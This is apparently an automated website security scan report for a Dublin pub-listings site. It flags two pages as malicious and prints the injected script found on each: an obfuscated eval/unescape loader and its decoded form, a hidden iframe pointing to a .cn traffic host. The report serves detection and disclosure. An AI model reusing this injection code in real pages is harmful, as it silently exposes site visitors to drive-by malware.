Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dublinpubscene.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.dublinpubscene.com/ | 200 OK Content-Length: 19043 Content-Type: text/html | clean |
http://www.dublinpubscene.com/quickads.txt | 200 OK Content-Length: 3843 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/test404page.js | 404 Not Found Content-Length: 301 Content-Type: text/html | clean |
http://www.dublinpubscene.com/catchline.txt | 200 OK Content-Length: 141 Content-Type: text/plain | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19468 Content-Type: text/javascript | clean |
http://www.dublinpubscene.com/copyright.txt | 200 OK Content-Length: 1582 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/thepubs/ | 200 OK Content-Length: 8987 Content-Type: text/html | clean |
http://www.dublinpubscene.com/thepubs/../quickads2.txt | 200 OK Content-Length: 3846 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/thepubs/../catchline.txt | 200 OK Content-Length: 141 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/thepubs/../copyright.txt | 200 OK Content-Length: 1582 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/entertainment/ | 200 OK Content-Length: 10380 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%76%61%72%20%64%35%31%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%31%36%2c%31%30%35%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%30%32%2c%31%30%32%2c%31%30%35%2c%39%39%2c%34%36%2c%39%39%2c%31%31%30%2c%34%37%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%30%32%2c%31%30%32%2c%31%30%35%2c%39%39%2c%34%39%2c%34%37%2c%31%30%33%2c%31%31%31%2c%34%36%2c%31%31%32%2c%31%30%34%2c%31%31%32%2c%36%33%2c%31%31%35%2c%31%30%35%2c%31%30%30%2c%36%31%2c%35%35%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%64%35%31%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b")); Decoded script: var d51 = String.fromCharCode(104,116,116,112,58,47,47,116,105,110,116,114,97,102,102,105,99,46,99,110,47,116,114,97,102,102,105,99,49,47,103,111,46,112,104,112,63,115,105,100,61,55);document.write(unescape('<iframe src=\''+d51+'\'></iframe>')); var d51 = String.fromCharCode(104,116,116,112,58,47,47,116,105,110,116,114,97,102,102,105,99,46,99,110,47,116,114,97,102,102,105,99,49,47,103,111,46,112,104,112,63,115,105,100,61,55);document.write(unescape('<iframe src=\''+d51+'\'></iframe>')); <iframe src='http://tintraffic.cn/traffic1/go.php?sid=7'></iframe> Antivirus reports:
| ||
http://www.dublinpubscene.com/entertainment/../quickads2.txt | 200 OK Content-Length: 3846 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/entertainment/../catchline.txt | 200 OK Content-Length: 141 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/entertainment/../copyright.txt | 200 OK Content-Length: 1582 Content-Type: text/plain | clean |
http://www.dublinpubscene.com/afterhours/ | 200 OK Content-Length: 9063 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%76%61%72%20%64%35%31%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%31%36%2c%31%30%35%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%30%32%2c%31%30%32%2c%31%30%35%2c%39%39%2c%34%36%2c%39%39%2c%31%31%30%2c%34%37%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%30%32%2c%31%30%32%2c%31%30%35%2c%39%39%2c%34%39%2c%34%37%2c%31%30%33%2c%31%31%31%2c%34%36%2c%31%31%32%2c%31%30%34%2c%31%31%32%2c%36%33%2c%31%31%35%2c%31%30%35%2c%31%30%30%2c%36%31%2c%35%35%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%64%35%31%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b")); Decoded script: var d51 = String.fromCharCode(104,116,116,112,58,47,47,116,105,110,116,114,97,102,102,105,99,46,99,110,47,116,114,97,102,102,105,99,49,47,103,111,46,112,104,112,63,115,105,100,61,55);document.write(unescape('<iframe src=\''+d51+'\'></iframe>')); var d51 = String.fromCharCode(104,116,116,112,58,47,47,116,105,110,116,114,97,102,102,105,99,46,99,110,47,116,114,97,102,102,105,99,49,47,103,111,46,112,104,112,63,115,105,100,61,55);document.write(unescape('<iframe src=\''+d51+'\'></iframe>')); <iframe src='http://tintraffic.cn/traffic1/go.php?sid=7'></iframe> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dublinpubscene.com
Result:
GET / HTTP/1.1
Host: dublinpubscene.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: dublinpubscene.com
Referer: http://www.google.com/search?q=dublinpubscene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dublinpubscene.com
Referer: http://www.google.com/search?q=dublinpubscene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.